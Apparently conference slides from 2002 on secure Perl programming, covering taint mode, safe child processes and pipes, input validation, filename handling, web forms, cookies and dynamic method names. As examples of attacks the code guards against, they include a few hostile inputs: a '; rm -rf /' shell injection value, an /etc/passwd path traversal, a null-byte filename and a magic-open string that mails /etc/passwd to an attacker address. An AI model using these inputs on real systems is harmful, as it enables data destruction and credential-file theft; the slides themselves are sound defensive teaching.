Secure Perl Programming

Peter Haworth

pmh@cpan.org

IOP Publishing Ltd.

O'Reilly Open Source Convention July 22-26, 2002

Outline

Robustness
Tainting
Child processes
Validate all user input
Filenames
Magic open()
Web applications
Safe sequence numbers
Dynamic method names

Introduction

Robustness

use strict
use warnings
Check return codes of system calls
```
  open STDOUT,'> write-protected';
```

Handle ``impossible cases'' explicitly

  if( $x == 1 ){
    do_this();
  }elsif( $x == 2 ){
    do_that();
  }

perl -T

Tainting

Data from external sources is tainted

  $^X  @ARGV  %ENV
  <>  read()  readline()  `` qx()    etc
  shmread()  msgrcv()  getpw*()      etc

All data derived from tainted data is also tainted

Tainted data can't affect external sources

  `` qx()  system()  exec()
  kill()
  unlink()  mkdir()  umask()  chmod()    etc
  open() (for writing)  NOT print() or write()

$1, $2, etc are (almost) never tainted
```
  my($untainted) = $tainted =~ /(\d+)/;
```

Child processes

Sanitise the environment
```
  %ENV=( PATH => '/bin:/usr/bin' );
```
Additional %ENV taint checks
```
  PATH IFS CDPATH ENV BASH_ENV
```

Don't invoke the shell

  # Unsafe:    $file eq "; rm -rf /"
  system "prog $file"      and die;

  # Safe
  system "prog \Q$file\E"  and die;

  # No shell, and less taint checks (for now)
  system '/bin/prog',$file and die;

Child processes - Safe pipes

Unsafe

  open my $fh,"| mail $user" or die;
  print $fh $msg;
  close $fh or die;

Safe, but invokes the shell

  open my $fh,"| /bin/mail \Q$user\E" or die;
  print $fh $msg;
  close $fh or die;

Safe and efficient

  defined(my $pid=open my $fh,'|-') or die;
  if(!$pid){
    exec '/bin/mail',$user;
    die "Can't exec";
  }
  print $fh $msg;
  close $fh or die;

Perl 5.8.0

  open my $fh,'|-','/bin/mail',$user or die;
  print $fh $msg;
  close $fh or die;

Validate all user input

Allow safe; don't disallow unsafe

  die "Bad!" if /[;<>&^"']/;     # Bad!

  die "Bad!" unless /^[\w\s]+$/; # Good

Check allowed ranges

  my ($num) = $input =~ /^(\d+)$/
    or die "Not an integer";

  $num >= 0 && $num <= 100
    or die "Out of range";

Make tests consistent

Filenames

Poison null byte

  # Unsafe if $filename eq "hello.unsafe\0"
  open my $fh, '<', "$filename.safe"
    or die "Invalid filename";

  # Safer
  die "Invalid filename"
    if $filename =~ /\0/;
  open my $fh, '<', "$filename.safe"
    or die "Invalid filename";

Don't allow paths

  # Prevents ../../../../etc/passwd
  die "Invalid filename"
    if $filename =~ m#/#;

Allow safe; don't disallow unsafe

  die "Invalid filename"
    unless $filename =~ /^\w+$/;

Magic `open()`

open FH,$fname;
Full magic

  > /etc/passwd
  mail evil@hacker.org < /etc/passwd |

open FH,"< $fname";
Slightly magical

  -f $fname;   # May be a different file

open FH,"< $fname\0";
No magic
my $fh=IO::File->new($fname,'<');
No magic, lexical filehandle
open my $fh,'<',$fname;
As above, with perl 5.6.0

Web applications - HTML forms

Hidden fields aren't secure

  <input type="hidden" name="password"
    value="secret">

Expect multiple values

  # Unsafe
  # fname=stuff&fname=action&fname=delete
  %config = (
    action => 'create',
    filename => $cgi->param('fname'),
  );

  # Safe
  $sth->execute(
    scalar $cgi->param('fname')
  );

Expect the unexpected

Web applications - Cookies

Mostly like hidden fields

Message digest adds security

  # Standard with perl 5.8.0
  use Digest::MD5 qw(md5_hex);

  $cookie_val = $val . md5_hex(
    md5_hex($val . $secret1) . $secret2
  );

Check expiry dates

Safe sequence numbers

Not like this!

  my $seqn=$dbh->selectall_arrayref(q(
    select max(key_field)
    from table1
  ))->[0][0]+1;

Let the database do it for you

  my $seqn=$dbh->selectall_arrayref(q(
    select nextval('name_of_sequence')
  ))->[0][0];

Or do it yourself

  sub nextval{
    my($name)=@_;
    $name=~/^\w+$/ or die "Bad sequence name";

    my $fh=IO::File->new("/path/$name",O_RDWR|O_CREAT)
                           or die "Can't open: $!";
    flock $fh,LOCK_EX      or die "Can't lock: $!";
    chomp(my $next=<$fh>);
    ++$next;
    seek $fh,0,0           or die "Can't rewind: $!";
    print $fh "$next\n"    or die "Can't write: $!";
    close $fh              or die "Can't close: $!";

    return $next;
  }

Dynamic method names

`$obj -> $meth ()`

Works if $meth is a method name

  my $meth = 'do_stuff';
  $obj -> $meth ();     # $obj->do_stuff()

Works across packages

  my $meth = 'Other::Pkg::do_stuff';
  $obj -> $meth ();

Taint checks don't protect

Restrict the user's choice

  if( $meth =~ /^\w+$/
    and my $ref = $obj->can("safe_$meth")
  ){
    $obj -> $ref ();
  }

Conclusion

Trust no-one
But do it carefully
It's not that hard

References

http://www.dwheeler.com/secure-programs/: Secure programming for Linux/Unix

http://www.w3.org/Security/Faq/: WWW Security FAQ

perldoc perlsec: Perl documentation on tainting

$CPAN/authors/id/P/PM/PMH/secprog-tpc2002.tgz: Latest version of these slides and speaker's notes